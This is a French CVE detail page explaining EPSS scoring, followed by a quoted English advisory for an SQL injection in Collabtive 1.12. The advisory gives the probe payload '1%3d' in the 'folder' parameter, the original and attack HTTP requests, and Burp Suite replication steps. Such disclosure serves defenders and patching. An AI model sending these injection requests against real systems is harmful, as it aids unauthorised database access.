CVE-2014-3246 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Vulnerability title: SQL Injection / SQL Error message in Collabtive application (CVE-2014-3246) CVE: CVE-2014-3246 (cordinated with Vendor: Collabtive Product: Collabtive (Open Source Project Management Software) Affected version: 1.12 Fixed version: 2.0 Reported by: Deepak Rathore Severity: Critical URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482 Affected Users: Authenticated users Affected parameter(s): folder Issue details: The folder parameter appears to be vulnerable to SQL injection attacks. The payload 1%3d was submitted in the folder parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL. HTTP request: GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1 Host: collabtive.o-dyn.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.0.3 Referer: http://xxx/managefile.php?action=showproject&id=2482 Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; PHPSESSID=ba83d29aab270a7926ea1be2e1f830be Connection: keep-alive Steps to replicate: 1. Login into application 2. Go to "Desktop" tab and click on "Add project" 3. Fill the project details in the project form and click on "Add" button 4. After creating a project go to "Files" tab and Intercept the request 5. At "manageajax.php" file, replace "folder" parameter value with "1%3d" ===================== Original Request ===================== GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1 Host: collabtive.o-dyn.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.0.3 Referer: http://xxx/managefile.php?action=showproject&id=2482 Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; PHPSESSID=ba83d29aab270a7926ea1be2e1f830be Connection: keep-alive ====================== Attack Request ====================== GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1 Host: collabtive.o-dyn.de User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.0.3 Referer: http://xxx/managefile.php?action=showproject&id=2482 Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be; PHPSESSID=ba83d29aab270a7926ea1be2e1f830be Connection: keep-alive ====================== 6. Forward manipulated request to server and wait for response in browser 7. SQL Error message is the proof of vulnerability. Tools used: Burp Suite proxy, Mozilla Firefox browser